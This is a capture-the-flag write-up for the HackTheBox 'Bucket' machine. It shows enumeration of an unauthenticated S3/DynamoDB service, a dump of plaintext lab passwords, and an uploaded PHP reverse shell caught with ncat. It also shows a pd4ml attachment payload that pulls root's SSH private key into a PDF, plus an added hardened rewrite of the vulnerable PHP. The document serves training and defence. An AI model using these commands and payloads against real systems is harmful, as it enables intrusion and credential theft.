Recon

Nmap shows two open ports, and a full-port scan gives the same result. Nmap also tells us that port 80 redirects to bucket.htb, so we add that hostname to /etc/hosts.

~/Documents/HTB/Bucket
cat nmap/initial
# Nmap 7.91 scan initiated Fri Nov 13 18:38:05 2020 as: nmap -sC -sV -oN nmap/initial -v 10.10.10.212
Nmap scan report for 10.10.10.212
Host is up (0.17s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http Apache httpd 2.4.41
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://bucket.htb/
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 13 18:38:37 2020 -- 1 IP address (1 host up) scanned in 31.88 seconds

Foothold

The web page references a new hostname, s3.bucket.htb, which serves the images. Given that third-level name and the box's name, this machine most likely involves AWS object storage (S3).

<article>
  <div class="coffee">
    <img src="http://s3.bucket.htb/adserver/images/bug.jpg" alt="Bug" height="160" width="160">
  </div>
  <div class="description">
    <h3>Bug Bounty and 0day Research</h3>
    <span>march 17, 2020 | Security</span>
    <p>Customised bug bounty and new 0day feeds. Feeds can be used on TV, mobile, desktop and web applications. Collecting security feeds from 100+ different trusted sources around the world.</p>
  </div>
</article>
<div class="articles">

  <article>
    <div class="coffee">
      <img src="http://s3.bucket.htb/adserver/images/malware.png" alt="Malware" height="160" width="160">
    </div>
    <div class="description">
      <h3>Ransomware Alerts</h3>
      <span>march 17, 2020 | Malware</span>
      <p>Run awareness ad campaigns on Ransomwares and other newly found malwares. Choose different types of malwares to fit for your campaign</p>
    </div>
  </article>

  <article>
    <div class="coffee">
      <img src="http://s3.bucket.htb/adserver/images/cloud.png" alt="cheer" height="160" width="160">
    </div>
    <div class="description">
      <h3>Cloud Updates</h3>
      <span>march 17, 2020 | Cloud</span>
      <p>Stay tuned to cloud technology updates. A superior alternative to Push Notifications and SMS A2P alerts. </p>
    </div>
  </article>

After adding the hostname to the hosts file and browsing to it, the server returns {"status": "running"}. Directory brute-forcing with gobuster finds two paths, /shell and /health.

~/Documents/HTB/Bucket
cat gobuster/s3.bucket.htb-root
/shell (Status: 200)
/health (Status: 200)
/server-status (Status: 403)

At this point I got stuck.


User.txt

After getting stuck, a tip from the forum pointed me to awscli, the official AWS command line interface. The bucket on this machine is effectively unauthenticated.

After reading through a pile of official documentation, I finally found a way forward.

LowPrivShell

Install awscli with:
sudo apt install -y awscli
After installation, run aws configure for the initial setup. Since this is a lab machine, the values entered can be anything.

Once configured, using the commands just learned, we can see that this object storage instance holds a single bucket, adserver.

~/Documents/HTB/Bucket
❯ aws s3 ls --endpoint-url http://s3.bucket.htb
2020-11-14 11:20:04 adserver

~/Documents/HTB/Bucket
❯ aws s3api list-buckets --endpoint-url http://s3.bucket.htb
{
"Buckets": [
{
"Name": "adserver",
"CreationDate": "2020-11-14T03:10:03.738061Z"
}
],
"Owner": {
"DisplayName": "webfile",
"ID": "bcaf1ffd86f41161ca5fb16fd081034f"
}
}

The /health path found by gobuster shows that the site also provides DynamoDB, the fully managed database service. With the following commands we can see that the database contains one table, users, and dump its contents.

It holds a set of passwords; note them down.

~/Documents/HTB/Bucket
❯ aws dynamodb list-tables --endpoint-url http://s3.bucket.htb
{
"TableNames": [
"users"
]
}

~/Documents/HTB/Bucket
❯ aws dynamodb scan --endpoint-url http://s3.bucket.htb --table-name users
{
"Items": [
{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
},
{
"password": {
"S": "Welcome123!"
},
"username": {
"S": "Cloudadm"
}
},
{
"password": {
"S": "n2vM-<_K_Q:.Aa2"
},
"username": {
"S": "Sysadm"
}
}
],
"Count": 3,
"ScannedCount": 3,
"ConsumedCapacity": null
}

The awscli s3 commands can upload a file into a given bucket. adserver is the bucket backing the web files, and PHP is installed, so uploading a PHP reverse shell gives us a shell.

~/Documents/HTB/Bucket
❯ aws s3 cp ./revshell.php s3://adserver --endpoint-url=http://s3.bucket.htb
upload: ./revshell.php to s3://adserver/revshell.php

~/Documents/HTB/Bucket
❯ aws s3 ls --endpoint-url http://s3.bucket.htb s3://adserver
PRE images/
2020-11-14 11:40:05 5344 index.html
2020-11-14 11:40:22 3459 revshell.php

After the upload, requesting s3.bucket.htb/adserver/revshell.php only triggers a download; for some reason, requesting http://bucket.htb/revshell.php is what gave the shell.

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.212.
Ncat: Connection from 10.10.10.212:59844.
Linux bucket 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
03:45:11 up 2:06, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@bucket:/$

UserShell

This part is easy: the box has a single user, roy. Trying each of the passwords collected earlier, n2vM-<_K_Q:.Aa2 works for su, which gets us user.txt.

www-data@bucket:/$ su - roy
su - roy
Password: n2vM-<_K_Q:.Aa2

roy@bucket:~$ wc -c user.txt
wc -c user.txt
33 user.txt
roy@bucket:~$

Privilege Escalation

Checking listening ports reveals a local listener on port 8000. The Apache configuration shows that port 8000 serves /var/www/bucket-app.

roy@bucket:/etc/apache2/sites-available$ cat 000-default.conf 
<VirtualHost 127.0.0.1:8000>
<IfModule mpm_itk_module>
AssignUserId root root
</IfModule>
DocumentRoot /var/www/bucket-app
</VirtualHost>

<VirtualHost *:80>
DocumentRoot /var/www/html
RewriteEngine On
RewriteCond %{HTTP_HOST} !^bucket.htb$
RewriteRule /.* http://bucket.htb/ [R]
</VirtualHost>
<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com
ProxyPreserveHost on
ProxyPass / http://localhost:4566/
ProxyPassReverse / http://localhost:4566/
<Proxy *>
Order deny,allow
Allow from all
</Proxy>
ServerAdmin webmaster@localhost
ServerName s3.bucket.htb
# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the loglevel for particular
# modules, e.g.
#LogLevel info ssl:warn

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

# For most configuration files from conf-available/, which are
# enabled or disabled at a global level, it is possible to
# include a line for only one particular virtual host. For example the
# following line enables the CGI configuration for this host only
# after it has been globally disabled with "a2disconf".
#Include conf-available/serve-cgi-bin.conf
</VirtualHost>

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet

After some searching, /var/www/bucket-app/index.php turns out to contain the following code, featuring our old friends file_put_contents and passthru. We do not control the variable used in passthru, but we do control what goes into file_put_contents. pd4ml_demo.jar is a small tool for generating PDFs.

<?php
// Excerpt from /var/www/bucket-app/index.php; the SDK import is the one
// this class requires.
use Aws\DynamoDb\DynamoDbClient;

if ($_SERVER["REQUEST_METHOD"] === "POST") {
    if ($_POST["action"] === "get_alerts") {
        date_default_timezone_set('America/New_York');
        // Client for the local AWS-compatible endpoint on port 4566
        $client = new DynamoDbClient([
            'profile'  => 'default',
            'region'   => 'us-east-1',
            'version'  => 'latest',
            'endpoint' => 'http://localhost:4566'
        ]);

        // Scan the alerts table for items whose title is "Ransomware"
        $iterator = $client->getIterator('Scan', array(
            'TableName' => 'alerts',
            'FilterExpression' => "title = :title",
            'ExpressionAttributeValues' => array(":title" => array("S" => "Ransomware")),
        ));

        // Each item's data attribute is written verbatim to files/<random>.html
        foreach ($iterator as $item) {
            $name = rand(1, 10000) . '.html';
            file_put_contents('files/' . $name, $item["data"]);
        }
        // The last file written is handed to pd4ml, which renders it to result.pdf
        passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
    }
}

Roughly, the code does the following:

  1. When we send a POST request whose body contains action = get_alerts, a new DynamoDbClient connection is created.
  2. It then uses getIterator to scan the alerts table and read the items matching the filter.
  3. The item content is written to an HTML file, which is passed as an argument to pd4ml to produce result.pdf.
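
As an added example, not code from the box or from the original post, here is a hardened PHP rewrite of that handler: it escapes the alert body before writing it, so pd4ml never sees a pd4ml:attachment tag pointing at a file:// path, uses an unpredictable filename, quotes every command argument, and handles an empty scan instead of reaching passthru with $name undefined. It assumes the AWS SDK for PHP is autoloaded through Composer and that data is a DynamoDB string attribute; the vhost's AssignUserId root root must separately be replaced by an unprivileged user, which code alone cannot fix.

```php
<?php
// Added example (not the box's code): hardened handler for action=get_alerts.
// Assumes the AWS SDK for PHP is installed via Composer and that the alert
// body is stored as a DynamoDB string attribute ("data": {"S": ...}).
require __DIR__ . '/vendor/autoload.php';

use Aws\DynamoDb\DynamoDbClient;

// Escape the alert body so it is rendered as text: pd4ml then sees
// "&lt;pd4ml:attachment&gt;", not a tag that makes it read a file:// URL.
function renderAlert(string $data): string
{
    return '<pre>' . htmlspecialchars($data, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</pre>';
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['action'] ?? '') === 'get_alerts') {
    $client = new DynamoDbClient([
        'profile'  => 'default',
        'region'   => 'us-east-1',
        'version'  => 'latest',
        'endpoint' => 'http://localhost:4566',
    ]);
    $iterator = $client->getIterator('Scan', [
        'TableName'                 => 'alerts',
        'FilterExpression'          => 'title = :title',
        'ExpressionAttributeValues' => [':title' => ['S' => 'Ransomware']],
    ]);

    $parts = [];
    foreach ($iterator as $item) {
        $parts[] = renderAlert($item['data']['S'] ?? '');
    }
    if ($parts === []) {
        // The original code reached passthru() with $name undefined here.
        http_response_code(404);
        exit('no matching alerts');
    }

    // One unpredictable file per request instead of rand(1, 10000).html.
    $dir  = __DIR__ . '/files';
    $name = bin2hex(random_bytes(16)) . '.html';
    file_put_contents("$dir/$name", '<html><body>' . implode("\n", $parts) . '</body></html>');

    // Every argument is quoted; the worker must also run as www-data, not via
    // "AssignUserId root root", so a renderer bug cannot read root's files.
    $cmd = 'java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd '
         . escapeshellarg("file://$dir/$name") . ' 800 A4 -out '
         . escapeshellarg("$dir/result.pdf");
    passthru($cmd);
}
```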

With that understood, the privilege escalation path is roughly:

  1. Create the alerts table
  2. Insert the content we want to read
  3. Send the POST request to trigger the conversion
  4. Download the PDF

Finally, following the pd4ml documentation, the file is embedded in the PDF as an attachment.

# create the table
aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url=http://s3.bucket.htb
# put the ssh key into the pdf as an attachment
aws dynamodb put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/.ssh/id_rsa</pd4ml:attachment>"}}' --endpoint-url=http://s3.bucket.htb
# trigger
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v

After it runs, the PDF contains the SSH key.


Finally, log in as root with the SSH key.

~/Documents/HTB/Bucket
❯ ssh -i id_rsa root@10.10.10.212
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-48-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sat 14 Nov 2020 09:15:44 AM UTC

System load: 0.0
Usage of /: 39.9% of 19.56GB
Memory usage: 27%
Swap usage: 0%
Processes: 198
Users logged in: 1
IPv4 address for br-bee97070fb20: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for ens160: 10.10.10.212
IPv6 address for ens160: dead:beef::250:56ff:feb9:24c3


91 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Oct 13 10:25:01 2020
root@bucket:~# wc -c root.txt
33 root.txt
root@bucket:~#